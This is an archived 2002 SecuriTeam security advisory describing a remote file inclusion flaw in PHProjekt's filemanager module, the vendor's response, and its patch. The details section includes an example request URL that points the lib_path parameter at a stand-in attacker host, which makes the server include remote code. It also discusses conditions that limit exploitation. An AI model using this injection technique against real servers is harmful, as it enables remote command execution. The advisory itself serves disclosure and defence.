[UNIX] Command execution in phprojekt
From: support@securiteam.comDate: 03/16/02
- Previous message: support@securiteam.com: "[NEWS] Directory Traversal Vulnerability in Phpimglist"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 16 Mar 2002 12:22:20 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Command execution in phprojekt
------------------------------------------------------------------------
SUMMARY
PHProjekt is a modular application for the coordination of group
activities and to share information and document via intranet and
internet. This script is a content management system for websites, much
like slashcode or phpnuke.
A vulnerability in this application allows remote attackers to execute
commands on the web server.
DETAILS
There problem is in the module filemanager, where you can directly access
the module and then define values which would have been defined with the
script's global configuration file had the module not be accessed
directly. The first line in filemanager/filemanager_forms.php is:
include_once("$lib_path/access_form.inc.php");
So an attacker could go to
http://example.com/filemanager/filemanager_forms.php?lib_path=http://attacker/nasty/scripts
And the script at http://hacker/nasty/scripts/access_form.inc.php would
get include()'d.
If php is compiled with all_url_fopen off then an attacker would have a
harder time exploiting this. Guessing the path to an uploaded script
seems to be the only other way of exploiting this (if magic_quotes is on -
else null byte can do some damage). Apparently this makes it secure,
since if the attacker uploads a script with the name lib_path the path
(ex. /tmp/random/access_form.inc.php) will be stored in $lib_path. This
would make the include_once try to include
/tmp/random/access_form.inc.php/access_form.inc.php which would not work.
PHP will delete this /tmp/randomcharacters/access_form.php when it ends,
so it cannot be sent as lib_path once the error msg (if display_errors is
on) tells the attacker the path to the script.
It would be best if all the modules included the global configuration file
as their first line and double check to make sure no variables are left to
other scripts passing them. Some sort of modules.php script like phpnuke
has wouldn't be a bad idea either and it locks security by making sure the
script isn't called directly.
The author took this advice and added this as the first line in the
module:
if (!defined("lib_included")) { die("Please use index.php!"); }
Vendor response:
The author was contacted and was very quick to respond. They also took
the security problem seriously, got out a patch asap, and notified their
mailing list. The author says the script will be in for a rewrite to help
improve overall security and structure. New version will be out shortly.
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0iler@hotmail.com> b0iler
_.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Directory Traversal Vulnerability in Phpimglist"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
